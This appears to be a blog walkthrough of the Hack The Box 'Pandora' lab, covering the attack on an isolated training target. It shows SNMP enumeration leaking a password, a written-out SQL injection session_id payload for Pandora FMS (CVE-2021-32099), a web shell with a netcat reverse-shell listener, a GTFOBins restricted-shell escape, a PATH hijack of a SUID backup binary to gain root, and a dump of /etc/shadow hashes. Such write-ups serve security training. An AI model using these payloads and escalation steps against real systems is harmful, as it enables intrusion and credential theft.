htb-pandora-private

htb pandora
source: hackthebox.eu

Highlights

┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo nmap -v --min-rate 10000 -sU pandora.htb -oN udp_nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-09 11:56 CEST
Initiating Ping Scan at 11:56
Scanning pandora.htb (10.10.11.136) [4 ports]
Completed Ping Scan at 11:56, 0.12s elapsed (1 total hosts)
Initiating UDP Scan at 11:56
Scanning pandora.htb (10.10.11.136) [1000 ports]
Discovered open port 161/udp on 10.10.11.136
Completed UDP Scan at 11:56, 0.70s elapsed (1000 total ports)
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.10s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
2049/udp closed nfs
16503/udp closed unknown
19075/udp closed unknown
21655/udp closed unknown
54925/udp closed unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.94 seconds
Raw packets sent: 2028 (93.718KB) | Rcvd: 9 (772B)
┌─[puck@parrot-lt]─[~/htb/pandora]
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrig
ger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.837 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.946 = ""
iso.3.6.1.2.1.25.4.2.1.5.948 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.3620 = ""

We can create an SSH tunnel to this service using

┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo ssh -L 80:localhost:80 daniel@pandora.htb
daniel@10.10.11.136's password:HotelBabylon23 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon 24 Jan 15:07:49 UTC 2022

System load: 0.37 Processes: 259
Usage of /: 63.6% of 4.87GB Users logged in: 1
Memory usage: 18% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Jan 24 15:06:04 2022 from 10.10.14.28
daniel@pandora:~$

so browse to : http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20–%20SgGO

https://github.com/zjicmDarkWing/CVE-2021-32099

and then visit http://127.0.0.1/pandora_console/

and you are logged on as admin

http://127.0.0.1/pandora_console/images/shell.php
┌─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.70] from (UNKNOWN) [10.10.11.136] 57258
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
07:20:43 up 2:02, 5 users, load average: 0.68, 0.63, 0.33
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.14.31 06:31 44:27 0.10s 0.00s ssh -L 80:127.0.0.1:80 daniel@pandora.htb
daniel pts/1 127.0.0.1 06:36 44:12 0.03s 0.03s -bash
daniel pts/2 10.10.14.31 06:39 41:41 0.03s 0.03s -bash
daniel pts/3 10.10.14.70 07:16 3:44 0.04s 0.04s -bash
daniel pts/4 10.10.14.55 07:10 11.00s 0.07s 0.07s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd

 

matt@pandora:/$ file /usr/bin/pandora_backup
file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:/$ /usr/bin/pandora_backup
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
matt@pandora:/$

The error is about permission issues regarding being unable to access a file present in the root directory.
But this binary has the SUID bit set, so the binary must run with root privileges. This seems to be a case of a
restricted shell.
We can use the /usr/bin/at binary to break out of this restricted shell, as instructed here in the  GTFOBINS

$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null

.

┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $ssh matt@pandora.htb -i id_rsa 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 25 Jan 11:48:33 UTC 2022

System load: 0.27 Processes: 288
Usage of /: 63.4% of 4.87GB Users logged in: 1
Memory usage: 11% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

matt@pandora:~$ ls
user.txt

matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
/home/matt/tar: 1: bin/bash: not found
Backup failed!
Check your permissions!
matt@pandora:~$ echo $PATH
/home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:~$ cat tar
bin/bash
matt@pandora:~$ echo "/bin/bash" > tar
matt@pandora:~$ cat tar
/bin/bash
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~# cd /root
root@pandora:/root# ls
root.txt
root@pandora:/root# cat root.txt
e50cb013f81c9bb1880dd795ffbaead8
root@pandora:/root# cat /etc/shadow\
> /
cat: /etc/shadow/: Not a directory
root@pandora:/root# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
--snip--:
sshd:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7:::
lxd:!:18789::::::
Debian-snmp:!:18789:0:99999:7:::
mysql:!:18789:0:99999:7:::
daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7:::
root@pandora:/root#
.
daniel@pandora:~$ ps aux | grep snmp
Debian-+ 856 0.0 0.3 22492 12712 ? Ss 09:23 0:01 /usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
daniel 1708 0.0 0.0 8160 2416 pts/0 S+ 10:33 0:00 grep --color=auto snmp

daniel@pandora:~$ apt list snmpd -a
Listing... Done
snmpd/focal-updates,focal-security,now 5.8+dfsg-2ubuntu2.3 amd64 [installed]
snmpd/focal 5.8+dfsg-2ubuntu2 amd64

daniel@pandora:~$ apt list snmp -a
Listing... Done
snmp/focal-updates,focal-security,now 5.8+dfsg-2ubuntu2.3 amd64 [installed]
snmp/focal 5.8+dfsg-2ubuntu2 amd64

daniel@pandora:~$
root@pandora:/home/matt# crontab -l
crontab -l
# Edit this file to introduce tasks to be run by cron.
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h dom mon dow command
@reboot sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
root@pandora:/home/matt#
.
root@pandora:/home/matt# cd /etc/snmp
root@pandora:/etc/snmp# ls -la
total 16
drwxr-xr-x 2 root root 4096 Jun 16 2021 .
drwxr-xr-x 105 root root 4096 Jun 10 08:40 ..
-rw-r--r-- 1 root root 510 Jun 23 2020 snmp.conf
-rw------- 1 root root 2960 Jun 16 2021 snmpd.conf
root@pandora:/etc/snmp# 


root@pandora:/home/matt# cat /etc/snmp/snmp.conf 
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
mibs :

# If you want to globally change where snmp libraries, commands and daemons
# look for MIBS, change the line below. Note you can set this for individual
# tools with the -M option or MIBDIRS environment variable.
#
# mibdirs /usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf

root@pandora:/home/matt# cat /etc/snmp/snmpd.conf 
###########################################################################
#
# snmpd.conf
# An example configuration file for configuring the Net-SNMP agent ('snmpd')
# See snmpd.conf(5) man page for details
#
###########################################################################
# SECTION: System Information Setup
#

# syslocation: The [typically physical] location of the system.
# Note that setting this value here means that when trying to
# perform an snmp SET operation to the sysLocation.0 variable will make
# the agent return the "notWritable" error code. IE, including
# this token in the snmpd.conf file will disable write access to
# the variable.
# arguments: location_string
sysLocation Mississippi
sysContact Daniel

# sysservices: The proper value for the sysServices object.
# arguments: sysservices_number
sysServices 72




###########################################################################
# SECTION: Agent Operating Mode
#
# This section defines how the agent will operate when it
# is running.

# master: Should the agent operate as a master agent or not.
# Currently, the only supported master agent type for this token
# is "agentx".
# 
# arguments: (on|yes|agentx|all|off|no)

master agentx

# agentaddress: The IP address and port number that the agent will listen on.
# By default the agent listens to any and all traffic from any
# interface on the default SNMP port (161). This allows you to
# specify which address, interface, transport type and port(s) that you
# want the agent to listen on. Multiple definitions of this token
# are concatenated together (using ':'s).
# arguments: [transport:]port[@interface/address],...

agentaddress udp:161,udp6:[::1]:161




###########################################################################
# SECTION: Access Control Setup
#
# This section defines who is allowed to talk to your running
# snmp agent.

# Views 
# arguments viewname included [oid]

# system + hrSystem groups only
view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1


# rocommunity: a SNMPv1/SNMPv2c read-only access community name
# arguments: community [default|hostname|network/bits] [oid | -V view]

# Read-only access to everyone to the systemonly view
rocommunity public
rocommunity6 public

# SNMPv3 doesn't use communities, but users with (optionally) an
# authentication and encryption string. This user needs to be created
# with what they can view with rouser/rwuser lines in this file.
#
# createUser username (MD5|SHA|SHA-512|SHA-384|SHA-256|SHA-224) authpassphrase [DES|AES] [privpassphrase]
# e.g.
# createuser authPrivUser SHA-512 myauthphrase AES myprivphrase
#
# This should be put into /var/lib/snmp/snmpd.conf 
#
# rouser: a SNMPv3 read-only access username
# arguments: username [noauth|auth|priv [OID | -V VIEW [CONTEXT]]]
rouser authPrivUser authpriv -V systemonly
root@pandora:/home/matt#

.

.
Posted on

Leave a Reply

Your email address will not be published.